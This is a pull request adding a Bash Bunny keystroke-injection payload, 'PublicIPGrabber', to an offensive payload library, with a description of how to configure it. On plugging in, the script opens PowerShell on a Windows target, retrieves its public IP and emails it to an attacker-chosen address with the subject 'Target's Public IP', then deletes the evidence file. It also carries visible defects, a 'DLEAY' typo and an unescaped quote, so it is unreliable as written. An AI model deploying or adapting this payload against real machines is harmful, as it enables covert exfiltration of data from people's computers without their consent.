### PR TITLE
PublicIPGrabber

### DIFF
--- a/payloads/library/credentials/PublicIPGrabber/duck_code.txt
+++ b/payloads/library/credentials/PublicIPGrabber/duck_code.txt
@@ -1,0 +1,60 @@
+REM Title: Public IP Grabber
+REM Author: HeadScratchCode
+REM Version: 1
+REM Description: Grabs the Public IP address being used by a Windows system, writes the found IP into ip.txt, emails the contents of ip.txt 
+DELAY 3000
+REM --> minimize all open windows 
+WINDOWS d
+REM --> open POWERSHELL
+WINDOWS r
+DELAY 400
+STRING POWERSHELL
+ENTER
+DELAY 200
+REM --> Grab the public IP
+STRING Invoke-RestMethod ipinfo.io/ip > ip.txt
+ENTER
+DELAY 1000
+REM --> Sending email
+STRING powershell
+ENTER
+DELAY 500
+STRING $SMTPServer = 'smtp.gmail.com'
+ENTER
+DELAY 500
+STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
+ENTER
+DELAY 500
+STRING $SMTPInfo.EnableSsl = $true
+ENTER
+DELAY 500
+STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('FROMEMAIL', 'FROMEMAILPASS')
+ENTER
+DELAY 500
+STRING $ReportEmail = New-Object System.Net.Mail.MailMessage
+ENTER
+DELAY 500
+STRING $ReportEmail.From = 'FROMEMAIL'
+ENTER
+DELAY 500
+STRING $ReportEmail.To.Add('SENDTOEMAIL')
+ENTER
+DELAY 500
+STRING $ReportEmail.Subject = 'Target's Public IP'
+ENTER
+DLEAY 500
+STRING $ReportEmail.Body = (Get-Content ip.txt | out-string)
+ENTER
+DELAY 500
+STRING $SMTPInfo.Send($ReportEmail)
+ENTER
+DELAY 1000
+REM --> Delete ip.txt and exit
+STRING del ip.txt
+ENTER
+DELAY 100
+STRING exit
+ENTER
+
+
+

--- a/payloads/library/credentials/PublicIPGrabber/payload.txt
+++ b/payloads/library/credentials/PublicIPGrabber/payload.txt
@@ -1,0 +1,5 @@
+#!/bin/bash
+LED B
+ATTACKMODE HID
+QUACK switch1/duck_code.txt
+LED G


### PR DESCRIPTION
Grabs the Public IP that a Windows machine is using over the Internet, then emails the info to a chosen email address.


Include the needed email address information to the email fields, in order for it to run. Also, most of the DELAY 500s are not needed, so they can be reduced or removed.
If you use a Gmail email account for this payload, you'll need to "allow less secure apps" in your Gmail settings. If this isn't done, the email won't send, and the powershell terminal will display an error.
